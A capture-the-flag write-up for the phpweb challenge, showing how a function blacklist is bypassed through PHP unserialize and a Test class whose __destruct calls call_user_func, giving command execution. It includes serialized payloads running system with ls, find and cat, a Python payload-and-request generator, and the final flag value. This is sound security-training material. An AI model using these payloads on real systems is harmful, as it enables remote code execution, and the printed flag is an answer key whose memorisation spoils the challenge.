[網鼎杯 2020 朱雀組]phpweb 1

Posted by TazmiDev on 2024-11-24


Open the instance: it is a PHP page. After a few seconds the page throws an error and reveals the request parameters it uses: func=date&p=Y-m-d h:i:s a


This looks like a request that passes a PHP function name and an argument for the server to execute, so try changing func to phpinfo:

func=phpinfo&p=Y-m-d h:i:s a


The parameter is filtered: phpinfo is rejected.

Use highlight_file to display the source of the current page. Because the page re-sends the request every few seconds, capture it in Burp Suite and replay it from there:

func=highlight_file&p=index.php


The page source is displayed successfully and contains the PHP code.

Copy the raw response body and paste it into a new HTML file (if you copy from the rendered response in Burp you get a pile of tags instead).

Comment out the refresh timer in the copied HTML.


Open the HTML file in a browser and copy out the PHP code:

```php
<?php
// Blacklist of function names that may not be passed as func.
// (The misspelled "registregister_shutdown_function" is in the challenge source as-is.)
$disable_fun = array("exec", "shell_exec", "system", "passthru", "proc_open", "show_source", "phpinfo", "popen", "dl", "eval", "proc_terminate", "touch", "escapeshellcmd", "escapeshellarg", "assert", "substr_replace", "call_user_func_array", "call_user_func", "array_filter", "array_walk", "array_map", "registregister_shutdown_function", "register_tick_function", "filter_var", "filter_var_array", "uasort", "uksort", "array_reduce", "array_walk", "array_walk_recursive", "pcntl_exec", "fopen", "fwrite", "file_put_contents");

// Calls $func($p) and returns the result only if it is a string.
function gettime($func, $p)
{
    $result = call_user_func($func, $p);
    $a = gettype($result);
    if ($a == "string") {
        return $result;
    } else {
        return "";
    }
}

// The destructor calls gettime() with whatever func/p the object holds,
// without passing func through the $disable_fun check below.
class Test
{
    var $p = "Y-m-d h:i:s a";
    var $func = "date";
    function __destruct()
    {
        if ($this->func != "") {
            echo gettime($this->func, $this->p);
        }
    }
}
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];

// The blacklist is only applied to the top-level func parameter.
if ($func != null) {
    $func = strtolower($func);
    if (!in_array($func, $disable_fun)) {
        echo gettime($func, $p);
    } else {
        die("Hacker...");
    }
}
```


Code audit

The $disable_fun array blacklists a large number of PHP functions.

Copy the code into VS Code and Ctrl+F for serialize: neither serialize nor unserialize is blacklisted, so unserialize is an allowed func. The Test class has a __destruct that calls gettime($this->func, $this->p) directly, and the in_array check only guards the top-level $func parameter, not the func property inside an unserialized object. An unserialized Test object with func set to a blacklisted function therefore reaches call_user_func when it is destroyed, which gives arbitrary code execution.


Build the payload with a local PHP script, using system to run commands:

```php
<?php
// Local copy of the target's class with only the two properties we need.
// PHP class names are case-insensitive, so "test" maps to the server's Test,
// whose __destruct() will run when the unserialized object is destroyed.
class test
{
    var $p = "ls";          // argument passed to $func
    var $func = "system";   // function invoked by gettime() in __destruct()
}

$func = new test();
$res = serialize($func);
echo $res;
```


The serialized string:

O:4:"test":2:{s:1:"p";s:2:"ls";s:4:"func";s:6:"system";}

Pass it as the p parameter with func=unserialize; the current directory listing comes back:

func=unserialize&p=O:4:"test":2:{s:1:"p";s:2:"ls";s:4:"func";s:6:"system";}
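The same payload can be generated without a PHP interpreter. The script below is an added example, not part of the original writeup or the challenge: it serializes a Test object for any command, computes the s:N: lengths in bytes the way PHP does (so a multi-byte command does not break the string), mirrors the server's strtolower/in_array check on the outer func, and builds the final request. The target URL http://target/index.php is an assumed placeholder.

```python
"""Generate the phpweb unserialize payload and request (added example)."""
import urllib.parse

# Blacklist copied from the challenge's $disable_fun array. It contains
# neither "serialize" nor "unserialize", which is the gap the exploit uses.
DISABLE_FUN = {
    "exec", "shell_exec", "system", "passthru", "proc_open", "show_source",
    "phpinfo", "popen", "dl", "eval", "proc_terminate", "touch",
    "escapeshellcmd", "escapeshellarg", "assert", "substr_replace",
    "call_user_func_array", "call_user_func", "array_filter", "array_walk",
    "array_map", "registregister_shutdown_function", "register_tick_function",
    "filter_var", "filter_var_array", "uasort", "uksort", "array_reduce",
    "array_walk_recursive", "pcntl_exec", "fopen", "fwrite", "file_put_contents",
}


def php_str(s: str) -> str:
    """Serialize a PHP string. PHP's length prefix counts bytes, not characters."""
    return f's:{len(s.encode("utf-8"))}:"{s}";'


def php_object(cls: str, props: dict) -> str:
    """Serialize an object with public properties in the given order."""
    body = "".join(php_str(k) + php_str(v) for k, v in props.items())
    return f'O:{len(cls.encode("utf-8"))}:"{cls}":{len(props)}:{{{body}}}'


def build_payload(cmd: str, func: str = "system", cls: str = "test") -> str:
    """Object that triggers Test::__destruct() -> gettime(func, p) on the target.

    The blacklist is never consulted for the properties of an unserialized
    object, so func may be "system" even though it is in DISABLE_FUN.
    """
    return php_object(cls, {"p": cmd, "func": func})


def top_level_allowed(func: str) -> bool:
    """Mirror the server's check on the outer func parameter."""
    return func.lower() not in DISABLE_FUN


def build_request(cmd: str, url: str = "http://target/index.php") -> str:
    """Full GET URL delivering the payload through func=unserialize."""
    outer = "unserialize"
    if not top_level_allowed(outer):
        raise ValueError(f"{outer} is blacklisted on this target")
    query = urllib.parse.urlencode({"func": outer, "p": build_payload(cmd)})
    return f"{url}?{query}"


if __name__ == "__main__":
    for cmd in ("ls", "find / -name flag*", "cat /tmp/flagoefiu4r93"):
        print(build_payload(cmd))
        print(build_request(cmd))
```

The URL-encoding matters in practice: the payload contains `"`, `{`, `;` and, for the find command, `*` and spaces, which a browser or Burp may mangle if pasted raw into the query string.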


No flag there, so list the root directory.



Still no flag, so search for it with find:

func=unserialize&p=O:4:"test":2:{s:1:"p";s:18:"find / -name flag*";s:4:"func";s:6:"system";}


Among the results, one file under /tmp stands out:


Read it with cat:

func=unserialize&p=O:4:"test":2:{s:1:"p";s:22:"cat /tmp/flagoefiu4r93";s:4:"func";s:6:"system";}


Flag obtained:


flag{f3b1f195-50f0-4d5b-8ce3-0d44d2ede1e2}
